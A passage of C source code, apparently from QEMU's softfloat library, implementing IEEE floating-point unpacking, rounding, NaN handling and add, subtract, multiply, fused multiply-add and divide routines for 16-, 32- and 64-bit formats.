uint64_t frac; int32_t exp; FloatClass cls; bool sign; } FloatParts; #define DECOMPOSED_BINARY_POINT (64 - 2) #define DECOMPOSED_IMPLICIT_BIT (1ull << DECOMPOSED_BINARY_POINT) #define DECOMPOSED_OVERFLOW_BIT (DECOMPOSED_IMPLICIT_BIT << 1) /* Structure holding all of the relevant parameters for a format. * exp_size: the size of the exponent field * exp_bias: the offset applied to the exponent field * exp_max: the maximum normalised exponent * frac_size: the size of the fraction field * frac_shift: shift to normalise the fraction with DECOMPOSED_BINARY_POINT * The following are computed based the size of fraction * frac_lsb: least significant bit of fraction * frac_lsbm1: the bit below the least significant bit (for rounding) * round_mask/roundeven_mask: masks used for rounding * The following optional modifiers are available: * arm_althp: handle ARM Alternative Half Precision */ typedef struct { int exp_size; int exp_bias; int exp_max; int frac_size; int frac_shift; uint64_t frac_lsb; uint64_t frac_lsbm1; uint64_t round_mask; uint64_t roundeven_mask; bool arm_althp; } FloatFmt; /* Expand fields based on the size of exponent and fraction */ #define FLOAT_PARAMS(E, F) \ .exp_size = E, \ .exp_bias = ((1 << E) - 1) >> 1, \ .exp_max = (1 << E) - 1, \ .frac_size = F, \ .frac_shift = DECOMPOSED_BINARY_POINT - F, \ .frac_lsb = 1ull << (DECOMPOSED_BINARY_POINT - F), \ .frac_lsbm1 = 1ull << ((DECOMPOSED_BINARY_POINT - F) - 1), \ .round_mask = (1ull << (DECOMPOSED_BINARY_POINT - F)) - 1, \ .roundeven_mask = (2ull << (DECOMPOSED_BINARY_POINT - F)) - 1 static const FloatFmt float16_params = { FLOAT_PARAMS(5, 10) }; static const FloatFmt float16_params_ahp = { FLOAT_PARAMS(5, 10), .arm_althp = true }; static const FloatFmt float32_params = { FLOAT_PARAMS(8, 23) }; static const FloatFmt float64_params = { FLOAT_PARAMS(11, 52) }; /* Unpack a float to parts, but do not canonicalize. */ static inline FloatParts unpack_raw(FloatFmt fmt, uint64_t raw) { const int sign_pos = fmt.frac_size + fmt.exp_size; return (FloatParts) { .cls = float_class_unclassified, .sign = extract64(raw, sign_pos, 1), .exp = extract64(raw, fmt.frac_size, fmt.exp_size), .frac = extract64(raw, 0, fmt.frac_size), }; } static inline FloatParts float16_unpack_raw(float16 f) { return unpack_raw(float16_params, f); } static inline FloatParts float32_unpack_raw(float32 f) { return unpack_raw(float32_params, f); } static inline FloatParts float64_unpack_raw(float64 f) { return unpack_raw(float64_params, f); } /* Pack a float from parts, but do not canonicalize. */ static inline uint64_t pack_raw(FloatFmt fmt, FloatParts p) { const int sign_pos = fmt.frac_size + fmt.exp_size; uint64_t ret = deposit64(p.frac, fmt.frac_size, fmt.exp_size, p.exp); return deposit64(ret, sign_pos, 1, p.sign); } static inline float16 float16_pack_raw(FloatParts p) { return make_float16(pack_raw(float16_params, p)); } static inline float32 float32_pack_raw(FloatParts p) { return make_float32(pack_raw(float32_params, p)); } static inline float64 float64_pack_raw(FloatParts p) { return make_float64(pack_raw(float64_params, p)); } /*---------------------------------------------------------------------------- | Functions and definitions to determine: (1) whether tininess for underflow | is detected before or after rounding by default, (2) what (if anything) | happens when exceptions are raised, (3) how signaling NaNs are distinguished | from quiet NaNs, (4) the default generated quiet NaNs, and (5) how NaNs | are propagated from function inputs to output. These details are target- | specific. *----------------------------------------------------------------------------*/ #include "softfloat-specialize.inc.c" /* Canonicalize EXP and FRAC, setting CLS. */ static FloatParts sf_canonicalize(FloatParts part, const FloatFmt *parm, float_status *status) { if (part.exp == parm->exp_max && !parm->arm_althp) { if (part.frac == 0) { part.cls = float_class_inf; } else { part.frac <<= parm->frac_shift; part.cls = (parts_is_snan_frac(part.frac, status) ? float_class_snan : float_class_qnan); } } else if (part.exp == 0) { if (likely(part.frac == 0)) { part.cls = float_class_zero; } else if (status->flush_inputs_to_zero) { float_raise(float_flag_input_denormal, status); part.cls = float_class_zero; part.frac = 0; } else { int shift = clz64(part.frac) - 1; part.cls = float_class_normal; part.exp = parm->frac_shift - parm->exp_bias - shift + 1; part.frac <<= shift; } } else { part.cls = float_class_normal; part.exp -= parm->exp_bias; part.frac = DECOMPOSED_IMPLICIT_BIT + (part.frac << parm->frac_shift); } return part; } /* Round and uncanonicalize a floating-point number by parts. There * are FRAC_SHIFT bits that may require rounding at the bottom of the * fraction; these bits will be removed. The exponent will be biased * by EXP_BIAS and must be bounded by [EXP_MAX-1, 0]. */ static FloatParts round_canonical(FloatParts p, float_status *s, const FloatFmt *parm) { const uint64_t frac_lsb = parm->frac_lsb; const uint64_t frac_lsbm1 = parm->frac_lsbm1; const uint64_t round_mask = parm->round_mask; const uint64_t roundeven_mask = parm->roundeven_mask; const int exp_max = parm->exp_max; const int frac_shift = parm->frac_shift; uint64_t frac, inc = 0; int exp, flags = 0; bool overflow_norm = false; frac = p.frac; exp = p.exp; switch (p.cls) { case float_class_normal: switch (s->float_rounding_mode) { case float_round_nearest_even: overflow_norm = false; inc = ((frac & roundeven_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_ties_away: overflow_norm = false; inc = frac_lsbm1; break; case float_round_to_zero: overflow_norm = true; inc = 0; break; case float_round_up: inc = p.sign ? 0 : round_mask; overflow_norm = p.sign; break; case float_round_down: inc = p.sign ? round_mask : 0; overflow_norm = !p.sign; break; case float_round_to_odd: overflow_norm = true; inc = frac & frac_lsb ? 0 : round_mask; break; default: g_assert_not_reached(); break; } exp += parm->exp_bias; if (likely(exp > 0)) { if (frac & round_mask) { flags |= float_flag_inexact; frac += inc; if (frac & DECOMPOSED_OVERFLOW_BIT) { frac >>= 1; exp++; } } frac >>= frac_shift; if (parm->arm_althp) { /* ARM Alt HP eschews Inf and NaN for a wider exponent. */ if (unlikely(exp > exp_max)) { /* Overflow. Return the maximum normal. */ flags = float_flag_invalid; exp = exp_max; frac = -1; } } else if (unlikely(exp >= exp_max)) { flags |= float_flag_overflow | float_flag_inexact; if (overflow_norm) { exp = exp_max - 1; frac = -1; } else { p.cls = float_class_inf; goto do_inf; } } } else if (s->flush_to_zero) { flags |= float_flag_output_denormal; p.cls = float_class_zero; goto do_zero; } else { bool is_tiny = (s->float_detect_tininess == float_tininess_before_rounding) || (exp < 0) || !((frac + inc) & DECOMPOSED_OVERFLOW_BIT); shift64RightJamming(frac, 1 - exp, &frac); if (frac & round_mask) { /* Need to recompute round-to-even. */ switch (s->float_rounding_mode) { case float_round_nearest_even: inc = ((frac & roundeven_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_to_odd: inc = frac & frac_lsb ? 0 : round_mask; break; } flags |= float_flag_inexact; frac += inc; } exp = (frac & DECOMPOSED_IMPLICIT_BIT ? 1 : 0); frac >>= frac_shift; if (is_tiny && (flags & float_flag_inexact)) { flags |= float_flag_underflow; } if (exp == 0 && frac == 0) { p.cls = float_class_zero; } } break; case float_class_zero: do_zero: exp = 0; frac = 0; break; case float_class_inf: do_inf: assert(!parm->arm_althp); exp = exp_max; frac = 0; break; case float_class_qnan: case float_class_snan: assert(!parm->arm_althp); exp = exp_max; frac >>= parm->frac_shift; break; default: g_assert_not_reached(); break; } float_raise(flags, s); p.exp = exp; p.frac = frac; return p; } /* Explicit FloatFmt version */ static FloatParts float16a_unpack_canonical(float16 f, float_status *s, const FloatFmt *params) { return sf_canonicalize(float16_unpack_raw(f), params, s); } static FloatParts float16_unpack_canonical(float16 f, float_status *s) { return float16a_unpack_canonical(f, s, &float16_params); } static float16 float16a_round_pack_canonical(FloatParts p, float_status *s, const FloatFmt *params) { return float16_pack_raw(round_canonical(p, s, params)); } static float16 float16_round_pack_canonical(FloatParts p, float_status *s) { return float16a_round_pack_canonical(p, s, &float16_params); } static FloatParts float32_unpack_canonical(float32 f, float_status *s) { return sf_canonicalize(float32_unpack_raw(f), &float32_params, s); } static float32 float32_round_pack_canonical(FloatParts p, float_status *s) { return float32_pack_raw(round_canonical(p, s, &float32_params)); } static FloatParts float64_unpack_canonical(float64 f, float_status *s) { return sf_canonicalize(float64_unpack_raw(f), &float64_params, s); } static float64 float64_round_pack_canonical(FloatParts p, float_status *s) { return float64_pack_raw(round_canonical(p, s, &float64_params)); } static FloatParts return_nan(FloatParts a, float_status *s) { switch (a.cls) { case float_class_snan: s->float_exception_flags |= float_flag_invalid; a = parts_silence_nan(a, s); /* fall through */ case float_class_qnan: if (s->default_nan_mode) { return parts_default_nan(s); } break; default: g_assert_not_reached(); break; } return a; } static FloatParts pick_nan(FloatParts a, FloatParts b, float_status *s) { if (is_snan(a.cls) || is_snan(b.cls)) { s->float_exception_flags |= float_flag_invalid; } if (s->default_nan_mode) { return parts_default_nan(s); } else { if (pickNaN(a.cls, b.cls, a.frac > b.frac || (a.frac == b.frac && a.sign < b.sign))) { a = b; } if (is_snan(a.cls)) { return parts_silence_nan(a, s); } } return a; } static FloatParts pick_nan_muladd(FloatParts a, FloatParts b, FloatParts c, bool inf_zero, float_status *s) { int which; if (is_snan(a.cls) || is_snan(b.cls) || is_snan(c.cls)) { s->float_exception_flags |= float_flag_invalid; } which = pickNaNMulAdd(a.cls, b.cls, c.cls, inf_zero, s); if (s->default_nan_mode) { /* Note that this check is after pickNaNMulAdd so that function * has an opportunity to set the Invalid flag. */ which = 3; } switch (which) { case 0: break; case 1: a = b; break; case 2: a = c; break; case 3: return parts_default_nan(s); default: g_assert_not_reached(); break; } if (is_snan(a.cls)) { return parts_silence_nan(a, s); } return a; } /* * Returns the result of adding or subtracting the values of the * floating-point values `a' and `b'. The operation is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic. */ static FloatParts addsub_floats(FloatParts a, FloatParts b, bool subtract, float_status *s) { bool a_sign = a.sign; bool b_sign = b.sign ^ subtract; if (a_sign != b_sign) { /* Subtraction */ if (a.cls == float_class_normal && b.cls == float_class_normal) { if (a.exp > b.exp || (a.exp == b.exp && a.frac >= b.frac)) { shift64RightJamming(b.frac, a.exp - b.exp, &b.frac); a.frac = a.frac - b.frac; } else { shift64RightJamming(a.frac, b.exp - a.exp, &a.frac); a.frac = b.frac - a.frac; a.exp = b.exp; a_sign ^= 1; } if (a.frac == 0) { a.cls = float_class_zero; a.sign = s->float_rounding_mode == float_round_down; } else { int shift = clz64(a.frac) - 1; a.frac = a.frac << shift; a.exp = a.exp - shift; a.sign = a_sign; } return a; } if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } if (a.cls == float_class_inf) { if (b.cls == float_class_inf) { float_raise(float_flag_invalid, s); return parts_default_nan(s); } return a; } if (a.cls == float_class_zero && b.cls == float_class_zero) { a.sign = s->float_rounding_mode == float_round_down; return a; } if (a.cls == float_class_zero || b.cls == float_class_inf) { b.sign = a_sign ^ 1; return b; } if (b.cls == float_class_zero) { return a; } } else { /* Addition */ if (a.cls == float_class_normal && b.cls == float_class_normal) { if (a.exp > b.exp) { shift64RightJamming(b.frac, a.exp - b.exp, &b.frac); } else if (a.exp < b.exp) { shift64RightJamming(a.frac, b.exp - a.exp, &a.frac); a.exp = b.exp; } a.frac += b.frac; if (a.frac & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(a.frac, 1, &a.frac); a.exp += 1; } return a; } if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } if (a.cls == float_class_inf || b.cls == float_class_zero) { return a; } if (b.cls == float_class_inf || a.cls == float_class_zero) { b.sign = b_sign; return b; } } g_assert_not_reached(); return a; } /* * Returns the result of adding or subtracting the floating-point * values `a' and `b'. The operation is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ float16 QEMU_FLATTEN float16_add(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, false, status); return float16_round_pack_canonical(pr, status); } float16 QEMU_FLATTEN float16_sub(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, true, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_addsub(float32 a, float32 b, bool subtract, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, subtract, status); return float32_round_pack_canonical(pr, status); } static inline float32 soft_f32_add(float32 a, float32 b, float_status *status) { return soft_f32_addsub(a, b, false, status); } static inline float32 soft_f32_sub(float32 a, float32 b, float_status *status) { return soft_f32_addsub(a, b, true, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_addsub(float64 a, float64 b, bool subtract, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, subtract, status); return float64_round_pack_canonical(pr, status); } static inline float64 soft_f64_add(float64 a, float64 b, float_status *status) { return soft_f64_addsub(a, b, false, status); } static inline float64 soft_f64_sub(float64 a, float64 b, float_status *status) { return soft_f64_addsub(a, b, true, status); } static float hard_f32_add(float a, float b) { return a + b; } static float hard_f32_sub(float a, float b) { return a - b; } static double hard_f64_add(double a, double b) { return a + b; } static double hard_f64_sub(double a, double b) { return a - b; } static bool f32_addsub_post(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return !(fpclassify(a.h) == FP_ZERO && fpclassify(b.h) == FP_ZERO); } return !(float32_is_zero(a.s) && float32_is_zero(b.s)); } static bool f64_addsub_post(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return !(fpclassify(a.h) == FP_ZERO && fpclassify(b.h) == FP_ZERO); } else { return !(float64_is_zero(a.s) && float64_is_zero(b.s)); } } static float32 float32_addsub(float32 a, float32 b, float_status *s, hard_f32_op2_fn hard, soft_f32_op2_fn soft) { return float32_gen2(a, b, s, hard, soft, f32_is_zon2, f32_addsub_post, NULL, NULL); } static float64 float64_addsub(float64 a, float64 b, float_status *s, hard_f64_op2_fn hard, soft_f64_op2_fn soft) { return float64_gen2(a, b, s, hard, soft, f64_is_zon2, f64_addsub_post, NULL, NULL); } float32 QEMU_FLATTEN float32_add(float32 a, float32 b, float_status *s) { return float32_addsub(a, b, s, hard_f32_add, soft_f32_add); } float32 QEMU_FLATTEN float32_sub(float32 a, float32 b, float_status *s) { return float32_addsub(a, b, s, hard_f32_sub, soft_f32_sub); } float64 QEMU_FLATTEN float64_add(float64 a, float64 b, float_status *s) { return float64_addsub(a, b, s, hard_f64_add, soft_f64_add); } float64 QEMU_FLATTEN float64_sub(float64 a, float64 b, float_status *s) { return float64_addsub(a, b, s, hard_f64_sub, soft_f64_sub); } /* * Returns the result of multiplying the floating-point values `a' and * `b'. The operation is performed according to the IEC/IEEE Standard * for Binary Floating-Point Arithmetic. */ static FloatParts mul_floats(FloatParts a, FloatParts b, float_status *s) { bool sign = a.sign ^ b.sign; if (a.cls == float_class_normal && b.cls == float_class_normal) { uint64_t hi, lo; int exp = a.exp + b.exp; mul64To128(a.frac, b.frac, &hi, &lo); shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); if (lo & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(lo, 1, &lo); exp += 1; } /* Re-use a */ a.exp = exp; a.sign = sign; a.frac = lo; return a; } /* handle all the NaN cases */ if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } /* Inf * Zero == NaN */ if ((a.cls == float_class_inf && b.cls == float_class_zero) || (a.cls == float_class_zero && b.cls == float_class_inf)) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } /* Multiply by 0 or Inf */ if (a.cls == float_class_inf || a.cls == float_class_zero) { a.sign = sign; return a; } if (b.cls == float_class_inf || b.cls == float_class_zero) { b.sign = sign; return b; } g_assert_not_reached(); return a; } float16 QEMU_FLATTEN float16_mul(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_mul(float32 a, float32 b, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_mul(float64 a, float64 b, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float64_round_pack_canonical(pr, status); } static float hard_f32_mul(float a, float b) { return a * b; } static double hard_f64_mul(double a, double b) { return a * b; } static bool f32_mul_fast_test(union_float32 a, union_float32 b) { return float32_is_zero(a.s) || float32_is_zero(b.s); } static bool f64_mul_fast_test(union_float64 a, union_float64 b) { return float64_is_zero(a.s) || float64_is_zero(b.s); } static float32 f32_mul_fast_op(float32 a, float32 b, float_status *s) { bool signbit = float32_is_neg(a) ^ float32_is_neg(b); return float32_set_sign(float32_zero, signbit); } static float64 f64_mul_fast_op(float64 a, float64 b, float_status *s) { bool signbit = float64_is_neg(a) ^ float64_is_neg(b); return float64_set_sign(float64_zero, signbit); } float32 QEMU_FLATTEN float32_mul(float32 a, float32 b, float_status *s) { return float32_gen2(a, b, s, hard_f32_mul, soft_f32_mul, f32_is_zon2, NULL, f32_mul_fast_test, f32_mul_fast_op); } float64 QEMU_FLATTEN float64_mul(float64 a, float64 b, float_status *s) { return float64_gen2(a, b, s, hard_f64_mul, soft_f64_mul, f64_is_zon2, NULL, f64_mul_fast_test, f64_mul_fast_op); } /* * Returns the result of multiplying the floating-point values `a' and * `b' then adding 'c', with no intermediate rounding step after the * multiplication. The operation is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic 754-2008. * The flags argument allows the caller to select negation of the * addend, the intermediate product, or the final result. (The * difference between this and having the caller do a separate * negation is that negating externally will flip the sign bit on * NaNs.) */ static FloatParts muladd_floats(FloatParts a, FloatParts b, FloatParts c, int flags, float_status *s) { bool inf_zero = ((1 << a.cls) | (1 << b.cls)) == ((1 << float_class_inf) | (1 << float_class_zero)); bool p_sign; bool sign_flip = flags & float_muladd_negate_result; FloatClass p_class; uint64_t hi, lo; int p_exp; /* It is implementation-defined whether the cases of (0,inf,qnan) * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN * they return if they do), so we have to hand this information * off to the target-specific pick-a-NaN routine. */ if (is_nan(a.cls) || is_nan(b.cls) || is_nan(c.cls)) { return pick_nan_muladd(a, b, c, inf_zero, s); } if (inf_zero) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } if (flags & float_muladd_negate_c) { c.sign ^= 1; } p_sign = a.sign ^ b.sign; if (flags & float_muladd_negate_product) { p_sign ^= 1; } if (a.cls == float_class_inf || b.cls == float_class_inf) { p_class = float_class_inf; } else if (a.cls == float_class_zero || b.cls == float_class_zero) { p_class = float_class_zero; } else { p_class = float_class_normal; } if (c.cls == float_class_inf) { if (p_class == float_class_inf && p_sign != c.sign) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } else { a.cls = float_class_inf; a.sign = c.sign ^ sign_flip; return a; } } if (p_class == float_class_inf) { a.cls = float_class_inf; a.sign = p_sign ^ sign_flip; return a; } if (p_class == float_class_zero) { if (c.cls == float_class_zero) { if (p_sign != c.sign) { p_sign = s->float_rounding_mode == float_round_down; } c.sign = p_sign; } else if (flags & float_muladd_halve_result) { c.exp -= 1; } c.sign ^= sign_flip; return c; } /* a & b should be normals now... */ assert(a.cls == float_class_normal && b.cls == float_class_normal); p_exp = a.exp + b.exp; /* Multiply of 2 62-bit numbers produces a (2*62) == 124-bit * result. */ mul64To128(a.frac, b.frac, &hi, &lo); /* binary point now at bit 124 */ /* check for overflow */ if (hi & (1ULL << (DECOMPOSED_BINARY_POINT * 2 + 1 - 64))) { shift128RightJamming(hi, lo, 1, &hi, &lo); p_exp += 1; } /* + add/sub */ if (c.cls == float_class_zero) { /* move binary point back to 62 */ shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); } else { int exp_diff = p_exp - c.exp; if (p_sign == c.sign) { /* Addition */ if (exp_diff <= 0) { shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT - exp_diff, &hi, &lo); lo += c.frac; p_exp = c.exp; } else { uint64_t c_hi, c_lo; /* shift c to the same binary point as the product (124) */ c_hi = c.frac >> 2; c_lo = 0; shift128RightJamming(c_hi, c_lo, exp_diff, &c_hi, &c_lo); add128(hi, lo, c_hi, c_lo, &hi, &lo); /* move binary point back to 62 */ shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); } if (lo & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(lo, 1, &lo); p_exp += 1; } } else { /* Subtraction */ uint64_t c_hi, c_lo; /* make C binary point match product at bit 124 */ c_hi = c.frac >> 2; c_lo = 0; if (exp_diff <= 0) { shift128RightJamming(hi, lo, -exp_diff, &hi, &lo); if (exp_diff == 0 && (hi > c_hi || (hi == c_hi && lo >= c_lo))) { sub128(hi, lo, c_hi, c_lo, &hi, &lo); } else { sub128(c_hi, c_lo, hi, lo, &hi, &lo); p_sign ^= 1; p_exp = c.exp; } } else { shift128RightJamming(c_hi, c_lo, exp_diff, &c_hi, &c_lo); sub128(hi, lo, c_hi, c_lo, &hi, &lo); } if (hi == 0 && lo == 0) { a.cls = float_class_zero; a.sign = s->float_rounding_mode == float_round_down; a.sign ^= sign_flip; return a; } else { int shift; if (hi != 0) { shift = clz64(hi); } else { shift = clz64(lo) + 64; } /* Normalizing to a binary point of 124 is the correct adjust for the exponent. However since we're shifting, we might as well put the binary point back at 62 where we really want it. Therefore shift as if we're leaving 1 bit at the top of the word, but adjust the exponent as if we're leaving 3 bits. */ shift -= 1; if (shift >= 64) { lo = lo << (shift - 64); } else { hi = (hi << shift) | (lo >> (64 - shift)); lo = hi | ((lo << shift) != 0); } p_exp -= shift - 2; } } } if (flags & float_muladd_halve_result) { p_exp -= 1; } /* finally prepare our result */ a.cls = float_class_normal; a.sign = p_sign ^ sign_flip; a.exp = p_exp; a.frac = lo; return a; } float16 QEMU_FLATTEN float16_muladd(float16 a, float16 b, float16 c, int flags, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pc = float16_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_muladd(float32 a, float32 b, float32 c, int flags, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pc = float32_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_muladd(float64 a, float64 b, float64 c, int flags, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pc = float64_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float64_round_pack_canonical(pr, status); } static bool force_soft_fma; float32 QEMU_FLATTEN float32_muladd(float32 xa, float32 xb, float32 xc, int flags, float_status *s) { union_float32 ua, ub, uc, ur; ua.s = xa; ub.s = xb; uc.s = xc; if (unlikely(!can_use_fpu(s))) { goto soft; } if (unlikely(flags & float_muladd_halve_result)) { goto soft; } float32_input_flush3(&ua.s, &ub.s, &uc.s, s); if (unlikely(!f32_is_zon3(ua, ub, uc))) { goto soft; } if (unlikely(force_soft_fma)) { goto soft; } /* * When (a || b) == 0, there's no need to check for under/over flow, * since we know the addend is (normal || 0) and the product is 0. */ if (float32_is_zero(ua.s) || float32_is_zero(ub.s)) { union_float32 up; bool prod_sign; prod_sign = float32_is_neg(ua.s) ^ float32_is_neg(ub.s); prod_sign ^= !!(flags & float_muladd_negate_product); up.s = float32_set_sign(float32_zero, prod_sign); if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = up.h + uc.h; } else { union_float32 ua_orig = ua; union_float32 uc_orig = uc; if (flags & float_muladd_negate_product) { ua.h = -ua.h; } if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = fmaf(ua.h, ub.h, uc.h); if (unlikely(f32_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabsf(ur.h) <= FLT_MIN)) { ua = ua_orig; uc = uc_orig; goto soft; } } if (flags & float_muladd_negate_result) { return float32_chs(ur.s); } return ur.s; soft: return soft_f32_muladd(ua.s, ub.s, uc.s, flags, s); } float64 QEMU_FLATTEN float64_muladd(float64 xa, float64 xb, float64 xc, int flags, float_status *s) { union_float64 ua, ub, uc, ur; ua.s = xa; ub.s = xb; uc.s = xc; if (unlikely(!can_use_fpu(s))) { goto soft; } if (unlikely(flags & float_muladd_halve_result)) { goto soft; } float64_input_flush3(&ua.s, &ub.s, &uc.s, s); if (unlikely(!f64_is_zon3(ua, ub, uc))) { goto soft; } if (unlikely(force_soft_fma)) { goto soft; } /* * When (a || b) == 0, there's no need to check for under/over flow, * since we know the addend is (normal || 0) and the product is 0. */ if (float64_is_zero(ua.s) || float64_is_zero(ub.s)) { union_float64 up; bool prod_sign; prod_sign = float64_is_neg(ua.s) ^ float64_is_neg(ub.s); prod_sign ^= !!(flags & float_muladd_negate_product); up.s = float64_set_sign(float64_zero, prod_sign); if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = up.h + uc.h; } else { union_float64 ua_orig = ua; union_float64 uc_orig = uc; if (flags & float_muladd_negate_product) { ua.h = -ua.h; } if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = fma(ua.h, ub.h, uc.h); if (unlikely(f64_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabs(ur.h) <= FLT_MIN)) { ua = ua_orig; uc = uc_orig; goto soft; } } if (flags & float_muladd_negate_result) { return float64_chs(ur.s); } return ur.s; soft: return soft_f64_muladd(ua.s, ub.s, uc.s, flags, s); } /* * Returns the result of dividing the floating-point value `a' by the * corresponding value `b'. The operation is performed according to * the IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts div_floats(FloatParts a, FloatParts b, float_status *s) { bool sign = a.sign ^ b.sign; if (a.cls == float_class_normal && b.cls == float_class_normal) { uint64_t n0, n1, q, r; int exp = a.exp - b.exp; /* * We want a 2*N / N-bit division to produce exactly an N-bit * result, so that we do not lose any precision and so that we * do not have to renormalize afterward. If A.frac < B.frac, * then division would produce an (N-1)-bit result; shift A left * by one to produce the an N-bit result, and decrement the * exponent to match. * * The udiv_qrnnd algorithm that we're using requires normalization, * i.e. the msb of the denominator must be set. Since we know that * DECOMPOSED_BINARY_POINT is msb-1, the inputs must be shifted left * by one (more), and the remainder must be shifted right by one. */ if (a.frac < b.frac) { exp -= 1; shift128Left(0, a.frac, DECOMPOSED_BINARY_POINT + 2, &n1, &n0); } else { shift128Left(0, a.frac, DECOMPOSED_BINARY_POINT + 1, &n1, &n0); } q = udiv_qrnnd(&r, n1, n0, b.frac << 1); /* * Set lsb if there is a remainder, to set inexact. * As mentioned above, to find the actual value of the remainder we * would need to shift right, but (1) we are only concerned about * non-zero-ness, and (2) the remainder will always be even because * both inputs to the division primitive are even. */ a.frac = q | (r != 0); a.sign = sign; a.exp = exp; return a; } /* handle all the NaN cases */ if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } /* 0/0 or Inf/Inf */ if (a.cls == b.cls && (a.cls == float_class_inf || a.cls == float_class_zero)) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } /* Inf / x or 0 / x */ if (a.cls == float_class_inf || a.cls == float_class_zero) { a.sign = sign; return a; } /* Div 0 => Inf */ if (b.cls == float_class_zero) { s->float_exception_flags |= float_flag_divbyzero; a.cls = float_class_inf; a.sign = sign; return a; } /* Div by Inf */ if (b.cls == float_class_inf) { a.cls = float_class_zero; a.sign = sign; return a; } g_assert_not_reached(); return a; } float16 float16_div(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_div(float32 a, float32 b, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_div(float64 a, float64 b, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float64_round_pack_canonical(pr, status); } static float hard_f32_div(float a, float b) { return a / b; } static double hard_f64_div(double a, double b) { return a / b; } static bool f32_div_pre(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && fpclassify(b.h) == FP_NORMAL; } return float32_is_zero_or_normal(a.s) && float32_is_normal(b.s); } static bool f64_div_pre(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && fpclassify(b.h) == FP_NORMAL; } return float64_is_zero_or_normal(a.s) && float64_is_normal(b.s); } static bool f32_div_post(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return fpclassify(a.h) != FP_ZERO; } 